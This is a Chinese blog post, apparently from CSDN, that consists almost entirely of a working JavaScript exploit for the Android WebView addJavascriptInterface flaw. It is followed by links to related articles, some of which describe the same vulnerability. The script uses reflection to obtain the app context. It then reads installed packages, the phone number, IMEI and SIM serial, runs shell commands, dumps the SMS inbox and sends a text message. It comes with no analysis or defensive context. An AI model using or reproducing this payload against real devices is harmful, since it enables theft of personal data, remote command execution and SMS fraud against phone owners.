安卓挂马代码

最新推荐文章于 2023-06-22 15:46:53 发布
最新推荐文章于 2023-06-22 15:46:53 发布
阅读量981 收藏
点赞数
分类专栏: web前端Hack 

<script>

function getContext(){

var obj, jsInterface, r;

for (var obj in window)

{

try {

if ("getClass" in window[ obj ]) {

try{

jsInterface = window[ obj ];

}catch(e){

}

}

} catch(e) {

}

}

if( !jsInterface ) return undefined;

r = function( jsInterface ){

this.jsInterface = jsInterface;

this.loadClass = function( className ){

return this.jni = this.jsInterface.getClass().getClassLoader().loadClass( className );

};

this.jni = this.loadClass( "android.webkit.JniUtil" );

var myfield = this.jni.getDeclaredField('sContext');

myfield.setAccessible( true );

this.context = myfield.get( this.jni );

}

return new r( jsInterface );

}

//绑定Context

var env = getContext();

//获取安装包

pm = env.context.getPackageManager()

document.write(pm.getInstalledPackages(0))

//检查权限

var checkPermission = function( permission ){

return env.context.getPackageManager().checkPermission( permission, env.context.getPackageName() ) == 0;

};

if( checkPermission( "android.permission.READ_PHONE_STATE" ) ){

var telephonyManager = env.context.getSystemService( "phone" );

document.write( telephonyManager.getLine1Number() );

document.write('<br />');

document.write( telephonyManager.getDeviceId() );

document.write('<br />');

document.write( telephonyManager.getSimSerialNumber() );

document.write('<br />');

}

//执行命令

var exec = function( commond ){

var runtimeClass = env.loadClass( "java.lang.Runtime" );

var runtime = runtimeClass.getMethod("getRuntime", {} ).invoke( null, {} );

var process = runtime.exec( commond );

var inputStream = process.getInputStream();

var contents = "";

var b = inputStream.read();

var i = 1;

while(b != -1) {

var bString = String.fromCharCode(b);

contents += bString;

b = inputStream.read();

}

return contents;

};

document.write( exec(["sh","-c","ls -l /mnt/sdcard/"]) );

//查短信

var ub = env.loadClass( "android.net.Uri$Builder" );

//var uri = ub.newInstance().scheme( "content" ).authority( "com.android.contacts" ).path( "data" ).build();

var uri = ub.newInstance().scheme( "content" ).authority( "sms" ).path( "inbox" ).build();

var contentResolver = env.context.getContentResolver();

var cursor = contentResolver.query( uri, [], "", [], "" );

var colcnt = cursor.getColumnCount();

while( cursor.moveToNext() ){

var t = "";

for( var i = 0; i < colcnt; i++ ){

var s = cursor.getString( i );

if( s !== undefined ){

t += cursor.getColumnName( i ) + ":" + s + ","+ "<br>";

}

}

document.write( t );

}

//发短信

var target = "10086";

var text = "Hello, message !";

var smsManagerClass = env.loadClass( "android.telephony.SmsManager" );

var smsManager = smsManagerClass.getMethod( "getDefault", {} ).invoke( null, {} );

smsManager.sendTextMessage( target, null, text, null, null );

</script>


zhiy_wis
关注
专栏目录
Android学习笔记:Android基础知识点(不断更新中)
浩比的专栏
10-28 2万+
1、Android系统的四大组件分别是:活动(Activity)、服务(Service)、广播接收器(Broadcast Receiver)、内容提供器(Content Provider)。 2、定义一个应用程序名的字符串,有以下两种方式来引用它:
Android 安全系列之---WebView中接口隐患与手机挂马利用
不只是写代码的程序员
09-05 3611
WebView中接口隐患与手机挂马利用  2人收藏 收藏 0x00 背景 在android的sdk中封装了webView控件。这个控件主要用开控制的网页浏览。在程序中装载webView控件,可以设置属性(颜色,字体等)。类似PC下directUI的功能。在webView 下有一个非常特殊的接口函数addJavascriptInterface。能实现本地java和js
安卓WebView中接口隐患与手机挂马利用(远程命令执行)
weixin_30756499的博客
09-05 421
安卓应用存在安全漏洞,浏览网站打开链接即可中招。目前有白帽子提交漏洞表明目前安卓平台上的应用普遍存在一个安全漏洞,用户打开一个链接就可导致远程安装恶意应用甚至完全控制用户手机,目前微信,手机QQ,QVOD以及各大手机浏览器均中招 0x00 背景 在android的sdk中封装了webView控件。这个控件主要用开控制的网页浏览。在程序中装载webView控件,可以设置属性(颜色,字体等...
Android WebView挂马漏洞--各大厂商纷纷落马
热门推荐
移动安全研究和Android/iOS/小程序隐私合规
09-06 1万+
近期,微信等多款安卓流行应用曝出高危挂马漏洞:只要点击好友消息或朋友圈中的一条网址,手机就会自动执行黑客指令,出现被安装恶意扣费软件、向好友发送欺诈短信、通讯录和短信被窃取等严重后果。在乌云漏洞平台上,包括安卓版微信、QQ、腾讯微博、QQ浏览器、快播、百度浏览器、金山浏览器等大批应用均被曝光同类型漏洞。
Android WebView挂马漏洞
u011572702的专栏
04-25 589
一、漏洞描述   近期,微信等多款安卓流行应用曝出高危挂马漏洞:只要点击好友消息或朋友圈中的一条网址,手机就会自动执行黑客指令,出现被安装恶意扣费软件、向好友发送欺诈短信、通讯录和短信被窃取等严重后果。在乌云漏洞平台上,包括安卓版微信、QQ、腾讯微博、QQ浏览器、快播、百度浏览器、金山浏览器等大批应用均被曝光同类型漏洞。   二、影响版本   Android系统
挂马方法简介
Walter的专栏
11-26 2454
一:框架挂马 此处地址会直接访问,所以如果是链接到exe文件的下载地址,那就会提示用户下载,用户一旦点击就会下载执行被挂马。 二:js文件挂马 首先将以下代码 document.write(""); 保存为xxx.js, 则JS挂马代码为 三:js变形加密 muma.txt可改成任意后缀 四:body挂马 五:隐蔽挂马 top.
恶意代码检测与防范技术复习
永远相信美好的事情即将发生
06-22 2245
传统计算机病毒定义:是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的一组计算机指令或者程序代码。计算机病毒的特征:非授权可执行性、隐蔽性、潜伏性、破坏性、可触发性。恶意代码:在未被授权的情况下,以破坏软硬件设备、窃取用户信息、扰乱用户心理、干扰用户正常使用为目的而编制的软件或代码片段。一个软件被看作是恶意代码主要是依据,而不是恶意代码本身的特征。
Android WebView 远程代码执行漏洞
bihansheng2010的博客
12-01 9327
Android的SDK中提供了的WebView组件,用于在应用中嵌入一个浏览器来进行网页浏览。 WebView组件中的addJavascriptInterface方法可以用于实现本地Java和JavaScript的交互。但是这个方法存在远程代码执行漏洞,远程攻击者利用此漏洞能实现本地java和js的交互,可对Android移动终端进行网页挂马从而控制受影响设备。
Android WebView挂马漏洞检测工具
05-04 572
https://security.tencent.com/index.php/opensource/detail/1 https://security.tencent.com/index.php/opensource/detail/1 https://security.tencent.com/index.php/opensource/detail/1
苹果maccms最新漏洞补丁 防止数据库被反复挂马
网站安全资讯
01-02 545
【推荐】2019 Java 开发者跳槽指南.pdf(吐血整理) >>> ...
第六章 恶意代码与防护
Sakura_Sora的博客
08-14 1642
恶意程序概述 恶意程序:运行在目标计算机上,使系统按照攻击者意愿而执行任务的一组指令 分类:计算机病毒、蠕虫、木马、隐遁工具、间谍软件、恶意广告、流氓软件、逻辑炸弹等 特征:强制安装、难以卸载、浏览器劫持、广告弹出、恶意收集用户信息、恶意卸载、恶意捆绑等 病毒与蠕虫 计算机病毒:编制或者计算机程序中插入的破坏计算机功能或者破坏数据、影响计算机使用并且能够自我复制的一组计算机指令或者程序 防范: 1、安装知名的杀毒软件,经常杀毒 2、不上不良网站 3、打开U盘时优先杀毒 4、不轻易下载小网站的软件 5、不要随
Oracle骨脚本卷积神经网络识别-RTL_CNN.zip
最新发布
10-03
Oracle骨脚本卷积神经网络识别-RTL_CNN
修改了谷歌提供的示例量子卷积神经网络模型,并在KDD99数据集上对其进行训练
10-03
修改了谷歌提供的示例量子卷积神经网络模型,并在KDD99数据集上对其进行训练,以实现网络攻击分类检测_ QuantumCnn NetworkAttackDetection
Eclipse下载、安装、配置教程(图文详解,建议收藏!!!)
10-03
eclipse Eclipse下载、安装、配置教程(图文详解,建议收藏!!!)
基于Python实现的地下车位分布算法设计源码
10-03
该项目是一个基于Python实现的地下车位分布算法设计源码,包含594个文件,其中包括542个Python源代码文件、19个可执行文件、6个文本文件、5个XML文件以及少量配置文件和模板文件。该算法旨在优化地下车位的分配与管理。
华为杯数学建模中,C题的数据清洗程序。_Math-Model-HuaWeiCup-2020.rar
10-03
华为杯数学建模中,C题的数据清洗程序。_Math-Model-HuaWeiCup-2020
基于OpenCV和Python的车牌号识别与提取设计源码
10-03
该项目是一款基于OpenCV和Python的车牌号识别与提取设计源码,包含44个文件,其中包括37个JPG图片文件用于车牌样本,4个Markdown文件提供项目文档,2个Python源文件实现核心算法,以及1个Python编译文件。该项目专注于车牌号码的自动识别,适用于各类需要车牌信息提取的应用场景。
全解析:九大常见挂马代码与攻击手段
本文档提供了详尽的挂马代码大全,涵盖了多个常见的恶意网页攻击技术,以便理解并防范此类网络安全威胁。以下是各个部分的详细解释: 1. **框架挂马**:利用 `<iframe>` 元素,设置其`src`属性指向恶意网站,通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值